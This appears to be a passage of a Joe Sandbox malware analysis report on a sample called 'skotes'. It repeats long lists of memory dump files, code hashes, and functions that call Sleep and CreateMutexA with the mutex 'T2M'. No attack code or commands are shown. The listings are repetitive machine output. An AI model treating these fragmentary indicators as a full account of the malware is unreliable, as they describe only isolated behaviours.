Associated: 00000002.00000002.2226275489.00000000006D0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226294618.00000000006D7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226315018.00000000006D9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226331084.00000000006DA000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226352626.00000000006DE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226368505.00000000006DF000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226384464.00000000006E4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226400933.00000000006EC000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226416513.00000000006ED000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226434118.00000000006F5000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226455642.00000000006F9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226478790.000000000070B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226571879.000000000070D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226593603.0000000000723000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226611832.0000000000729000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226611832.0000000000748000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226656798.0000000000775000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226675931.0000000000776000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226690703.0000000000777000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226706831.000000000077D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226722414.000000000077F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226740940.000000000078D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226757505.000000000078F000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_470000_skotes.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID: T2M
API String ID: 1464230837-1911109154
Opcode ID: c3b692ceb17df83cdb1718c7111e68a914f087dc411fcb63fe0c0ba99d8b716d
Instruction ID: c6f0929b8bec3bfa22b635ca04744ceecde7819bc58177b99e8033d0122a14ff
Opcode Fuzzy Hash: c3b692ceb17df83cdb1718c7111e68a914f087dc411fcb63fe0c0ba99d8b716d
Instruction Fuzzy Hash: BB314A71B011019BEB18DB78DD8CBADB762DBC6310F20865AE018973D2D77E8990871A

Function 0047A418 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 133
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000064), ref: 0047A963
CreateMutexA.KERNELBASE(00000000,00000000,004D3254), ref: 0047A981

Strings

T2M, xrefs: 0047A970

Memory Dump Source

Source File: 00000002.00000002.2224996195.0000000000471000.00000040.00000001.01000000.00000007.sdmp, Offset: 00470000, based on PE: true

Associated: 00000002.00000002.2224670067.0000000000470000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2224996195.00000000004D2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2225159080.00000000004D9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2225176441.00000000004DB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2225279090.00000000004E7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2225572927.0000000000644000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2225657582.0000000000646000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2225758100.0000000000660000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2225783831.0000000000662000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2225840476.0000000000664000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2225840476.000000000066D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2225942676.0000000000671000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2225988723.0000000000672000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226005704.0000000000673000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226022713.0000000000674000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226039783.0000000000675000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226056811.0000000000677000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226077921.0000000000687000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226094470.0000000000688000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226109889.0000000000690000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226125265.0000000000691000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226140557.0000000000699000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226154213.000000000069A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226170008.000000000069B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226194580.00000000006B0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226211891.00000000006B1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226230667.00000000006B3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226252851.00000000006CE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226275489.00000000006D0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226294618.00000000006D7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226315018.00000000006D9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226331084.00000000006DA000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226352626.00000000006DE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226368505.00000000006DF000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226384464.00000000006E4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226400933.00000000006EC000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226416513.00000000006ED000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226434118.00000000006F5000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226455642.00000000006F9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226478790.000000000070B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226571879.000000000070D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226593603.0000000000723000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226611832.0000000000729000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226611832.0000000000748000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226656798.0000000000775000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226675931.0000000000776000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226690703.0000000000777000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226706831.000000000077D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226722414.000000000077F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226740940.000000000078D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226757505.000000000078F000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_470000_skotes.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID: T2M
API String ID: 1464230837-1911109154
Opcode ID: 223048798cb4c86f50d0556252bc19479861d25b95800bd8f1c847374a0063cb
Instruction ID: ee1a64f18b0f08087bf60114bbeabf4ba5cb6fc34538389b28ec0bc2200d76d3
Opcode Fuzzy Hash: 223048798cb4c86f50d0556252bc19479861d25b95800bd8f1c847374a0063cb
Instruction Fuzzy Hash: 5E314771B001009BEB18AB78DD8DBADB762DBC6314F24861AE018973D6D77E8990871A

Function 0047A54D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 132
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000064), ref: 0047A963
CreateMutexA.KERNELBASE(00000000,00000000,004D3254), ref: 0047A981

Strings

T2M, xrefs: 0047A970

Memory Dump Source

Source File: 00000002.00000002.2224996195.0000000000471000.00000040.00000001.01000000.00000007.sdmp, Offset: 00470000, based on PE: true

Associated: 00000002.00000002.2224670067.0000000000470000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2224996195.00000000004D2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2225159080.00000000004D9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2225176441.00000000004DB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2225279090.00000000004E7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2225572927.0000000000644000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2225657582.0000000000646000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2225758100.0000000000660000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2225783831.0000000000662000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2225840476.0000000000664000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2225840476.000000000066D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2225942676.0000000000671000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2225988723.0000000000672000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226005704.0000000000673000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226022713.0000000000674000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226039783.0000000000675000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226056811.0000000000677000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226077921.0000000000687000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226094470.0000000000688000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226109889.0000000000690000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226125265.0000000000691000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226140557.0000000000699000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226154213.000000000069A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226170008.000000000069B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226194580.00000000006B0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226211891.00000000006B1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226230667.00000000006B3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226252851.00000000006CE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226275489.00000000006D0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226294618.00000000006D7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226315018.00000000006D9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226331084.00000000006DA000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226352626.00000000006DE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226368505.00000000006DF000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226384464.00000000006E4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226400933.00000000006EC000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226416513.00000000006ED000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226434118.00000000006F5000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226455642.00000000006F9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226478790.000000000070B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226571879.000000000070D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226593603.0000000000723000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226611832.0000000000729000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226611832.0000000000748000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226656798.0000000000775000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226675931.0000000000776000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226690703.0000000000777000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226706831.000000000077D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226722414.000000000077F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226740940.000000000078D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226757505.000000000078F000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_470000_skotes.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID: T2M
API String ID: 1464230837-1911109154
Opcode ID: c117f950342a46b3f9bca3776b87404115cd40664f35952cdf91ab7981335abf
Instruction ID: 25fa2970f7b20cf40dbc2386bbb36ca4846abff3b0440f997960a23fff22b47a
Opcode Fuzzy Hash: c117f950342a46b3f9bca3776b87404115cd40664f35952cdf91ab7981335abf
Instruction Fuzzy Hash: F6312971B011019BEB18DB78DD8DBADB762DBC6314F24C61AE058973D2C77D89A0871A

Function 0047A682 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 131
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000064), ref: 0047A963
CreateMutexA.KERNELBASE(00000000,00000000,004D3254), ref: 0047A981

Strings

T2M, xrefs: 0047A970

Memory Dump Source

Source File: 00000002.00000002.2224996195.0000000000471000.00000040.00000001.01000000.00000007.sdmp, Offset: 00470000, based on PE: true

Associated: 00000002.00000002.2224670067.0000000000470000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2224996195.00000000004D2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2225159080.00000000004D9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2225176441.00000000004DB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2225279090.00000000004E7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2225572927.0000000000644000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2225657582.0000000000646000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2225758100.0000000000660000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2225783831.0000000000662000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2225840476.0000000000664000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2225840476.000000000066D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2225942676.0000000000671000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2225988723.0000000000672000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226005704.0000000000673000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226022713.0000000000674000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226039783.0000000000675000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226056811.0000000000677000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226077921.0000000000687000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226094470.0000000000688000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226109889.0000000000690000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226125265.0000000000691000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226140557.0000000000699000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226154213.000000000069A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226170008.000000000069B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226194580.00000000006B0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226211891.00000000006B1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226230667.00000000006B3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226252851.00000000006CE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226275489.00000000006D0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226294618.00000000006D7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226315018.00000000006D9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226331084.00000000006DA000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226352626.00000000006DE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226368505.00000000006DF000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226384464.00000000006E4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226400933.00000000006EC000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226416513.00000000006ED000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226434118.00000000006F5000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226455642.00000000006F9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226478790.000000000070B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226571879.000000000070D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226593603.0000000000723000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226611832.0000000000729000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226611832.0000000000748000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226656798.0000000000775000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226675931.0000000000776000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226690703.0000000000777000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226706831.000000000077D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226722414.000000000077F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226740940.000000000078D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226757505.000000000078F000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_470000_skotes.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID: T2M
API String ID: 1464230837-1911109154
Opcode ID: f586ef2b5dff3ce35142fe500c96b535c3839f71b66d4540616bf3d33c105ffb
Instruction ID: c3b3aedd603a3a7de8327f596419c211ed8c6b04548dacb44f9358d860243cdd
Opcode Fuzzy Hash: f586ef2b5dff3ce35142fe500c96b535c3839f71b66d4540616bf3d33c105ffb
Instruction Fuzzy Hash: 90311771A012008BEB18DB78DD89BADB762DBC6314F24C61AE058973D1C77D8990875A

Function 00479ADC Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 107
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000064), ref: 0047A963
CreateMutexA.KERNELBASE(00000000,00000000,004D3254), ref: 0047A981

Strings

T2M, xrefs: 0047A970

Memory Dump Source

Source File: 00000002.00000002.2224996195.0000000000471000.00000040.00000001.01000000.00000007.sdmp, Offset: 00470000, based on PE: true

Associated: 00000002.00000002.2224670067.0000000000470000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2224996195.00000000004D2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2225159080.00000000004D9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2225176441.00000000004DB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2225279090.00000000004E7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2225572927.0000000000644000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2225657582.0000000000646000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2225758100.0000000000660000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2225783831.0000000000662000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2225840476.0000000000664000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2225840476.000000000066D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2225942676.0000000000671000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2225988723.0000000000672000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226005704.0000000000673000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226022713.0000000000674000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226039783.0000000000675000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226056811.0000000000677000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226077921.0000000000687000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226094470.0000000000688000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226109889.0000000000690000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226125265.0000000000691000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226140557.0000000000699000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226154213.000000000069A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226170008.000000000069B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226194580.00000000006B0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226211891.00000000006B1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226230667.00000000006B3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226252851.00000000006CE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226275489.00000000006D0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226294618.00000000006D7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226315018.00000000006D9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226331084.00000000006DA000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226352626.00000000006DE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226368505.00000000006DF000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226384464.00000000006E4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226400933.00000000006EC000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226416513.00000000006ED000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226434118.00000000006F5000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226455642.00000000006F9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226478790.000000000070B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226571879.000000000070D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226593603.0000000000723000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226611832.0000000000729000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226611832.0000000000748000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226656798.0000000000775000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226675931.0000000000776000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226690703.0000000000777000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226706831.000000000077D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226722414.000000000077F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226740940.000000000078D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226757505.000000000078F000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_470000_skotes.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID: T2M
API String ID: 1464230837-1911109154
Opcode ID: 844cbc539c1cd2cd5f359991db56e410060f8aac3bfab7393fb5ac8797e750d2
Instruction ID: 32f1c1cad3ebeed7af6ea12e1b97109ecbe5e6fe271f4729657f8ce5c9ae35e9
Opcode Fuzzy Hash: 844cbc539c1cd2cd5f359991db56e410060f8aac3bfab7393fb5ac8797e750d2
Instruction Fuzzy Hash: BA212871B052019BEB18AB68EC8DBADB762EBC5310F20861FE41C973D1D77D99508B1A

Function 0047A856 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000064), ref: 0047A963
CreateMutexA.KERNELBASE(00000000,00000000,004D3254), ref: 0047A981

Strings

T2M, xrefs: 0047A970

Memory Dump Source

Source File: 00000002.00000002.2224996195.0000000000471000.00000040.00000001.01000000.00000007.sdmp, Offset: 00470000, based on PE: true

Associated: 00000002.00000002.2224670067.0000000000470000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2224996195.00000000004D2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2225159080.00000000004D9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2225176441.00000000004DB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2225279090.00000000004E7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2225572927.0000000000644000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2225657582.0000000000646000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2225758100.0000000000660000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2225783831.0000000000662000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2225840476.0000000000664000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2225840476.000000000066D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2225942676.0000000000671000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2225988723.0000000000672000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226005704.0000000000673000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226022713.0000000000674000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2226039783.0000000000675000.00000080.00000001.01000000.00000007.sdmpDownload File
